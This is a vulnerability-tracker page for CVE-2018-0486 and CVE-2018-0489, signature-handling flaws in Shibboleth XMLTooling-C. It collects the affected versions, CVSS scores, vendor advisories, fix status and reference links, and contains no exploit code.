CVE-2018-0486
published 2018-01-13CVE-2018-0486: Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user…
PriorityP429medium6.5CVSS 3.0
AVNACLPRNUINSUCLILAN
EPSS
1.52%
71.4th percentile
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | clearpass | 6.6.0 – 6.6.9 | — |
| arubanetworks | clearpass | >= 6.7.0 < 6.7.2 | 6.7.2 |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | xmltooling | < xmltooling 1.6.3-1 (bookworm) | xmltooling 1.6.3-1 (bookworm) |
| debian | xmltooling | < xmltooling 1.6.4-1 (bookworm) | xmltooling 1.6.4-1 (bookworm) |
| shibboleth | xmltooling-c | < 1.6.3 | 1.6.3 |
| shibboleth | xmltooling-c | < 1.6.4 | 1.6.4 |
| xmltooling_project | xmltooling | >= 0 < 1.6.4-1 | 1.6.4-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.3-1 | 1.6.3-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.4-1 | 1.6.4-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.3-1 | 1.6.3-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.4-1 | 1.6.4-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.3-1 | 1.6.3-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.4-1 | 1.6.4-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.3-1 | 1.6.3-1 |
CVSS provenance
nvdv3.06.5MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv6.5MEDIUM
vendor_debian6.5MEDIUM
vendor_redhat6.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
openSAML: Mishandling of comments in SAML content can lead to bypass of signature verification
vendor_redhat·2018-02-27·CVSS 6.5
CVE-2018-0489 [MEDIUM] CWE-287 openSAML: Mishandling of comments in SAML content can lead to bypass of signature verification
openSAML: Mishandling of comments in SAML content can lead to bypass of signature verification
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
Package: opensaml-core (Red Hat JBoss Enterprise Application Platform 6) - Not affected
Package: opensaml-core (Red Hat JBoss Enterprise Application Platform 7) - Not affected
Red Hat
xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
vendor_redhat·2018-01-12·CVSS 6.5
CVE-2018-0486 [MEDIUM] CWE-287 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Package: xmltooling (Red Hat JBoss Data Grid 6) - Not affected
Package: xmltooling (Red Hat JBoss Data Virtualization 6) - Not affected
Package: xmltooling (Red Hat JBoss Enterprise Application Platform 6) - Not affected
Package: xmltooling (Red Hat JBoss Fuse 6) - Not affected
Package: xmltooling (Red Hat JBoss Fuse Service Works 6) - Not affected
Package: XMLTooling (Red Hat JBoss Operatio
Debian
CVE-2018-0486: xmltooling - Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider bef...
vendor_debian·2018·CVSS 6.5
CVE-2018-0486 [MEDIUM] CVE-2018-0486: xmltooling - Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider bef...
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Scope: local
bookworm: resolved (fixed in 1.6.3-1)
bullseye: resolved (fixed in 1.6.3-1)
forky: resolved (fixed in 1.6.3-1)
sid: resolved (fixed in 1.6.3-1)
trixie: resolved (fixed in 1.6.3-1)
Debian
CVE-2018-0489: xmltooling - Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider bef...
vendor_debian·2018·CVSS 6.5
CVE-2018-0489 [MEDIUM] CVE-2018-0489: xmltooling - Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider bef...
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
Scope: local
bookworm: resolved (fixed in 1.6.4-1)
bullseye: resolved (fixed in 1.6.4-1)
forky: resolved (fixed in 1.6.4-1)
sid: resolved (fixed in 1.6.4-1)
trixie: resolved (fixed in 1.6.4-1)
GHSA
GHSA-4479-q654-wmq5: Shibboleth XMLTooling-C before 1
ghsa_unreviewed·2022-05-14·CVSS 6.5
CVE-2018-0489 [MEDIUM] CWE-347 GHSA-4479-q654-wmq5: Shibboleth XMLTooling-C before 1
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
GHSA
GHSA-34v3-mf7p-7v76: Shibboleth XMLTooling-C before 1
ghsa_unreviewed·2022-05-14
CVE-2018-0486 [MEDIUM] CWE-347 GHSA-34v3-mf7p-7v76: Shibboleth XMLTooling-C before 1
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
OSV
CVE-2018-0489: Shibboleth XMLTooling-C before 1
osv·2018-02-27·CVSS 6.5
CVE-2018-0489 [MEDIUM] CVE-2018-0489: Shibboleth XMLTooling-C before 1
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
OSV
CVE-2018-0486: Shibboleth XMLTooling-C before 1
osv·2018-01-13·CVSS 6.5
CVE-2018-0486 [MEDIUM] CVE-2018-0486: Shibboleth XMLTooling-C before 1
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD [fedora-all]
bugzilla·2018-01-15·CVSS 6.5
CVE-2018-0486 [MEDIUM] CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD [fedora-all]
CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit mes
Bugzilla
CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
bugzilla·2018-01-15·CVSS 6.5
CVE-2018-0486 [MEDIUM] CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
A flaw was found in Shibboleth XMLTooling-C. Versions before 1.6.3 mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
The Service Provider software relies on a generic XML parser to process SAML responses and there are limitations in older versions of the parser that make it impossible to fully disable Document Type Definition (DTD) processing. Through addition/manipulation of a DTD, it's possible to make changes to an XML document that do not break a digital signature but are mishandled by the SP and its libraries. These manipulations can alter the u
http://www.securitytracker.com/id/1040177https://lists.debian.org/debian-lts-announce/2018/01/msg00016.htmlhttps://lists.debian.org/debian-security-announce/2018/msg00007.htmlhttps://shibboleth.net/community/advisories/secadv_20180112.txthttps://www.debian.org/security/2018/dsa-4085http://www.securitytracker.com/id/1040177https://lists.debian.org/debian-lts-announce/2018/01/msg00016.htmlhttps://lists.debian.org/debian-security-announce/2018/msg00007.htmlhttps://shibboleth.net/community/advisories/secadv_20180112.txthttps://www.debian.org/security/2018/dsa-4085
2018-01-13
Published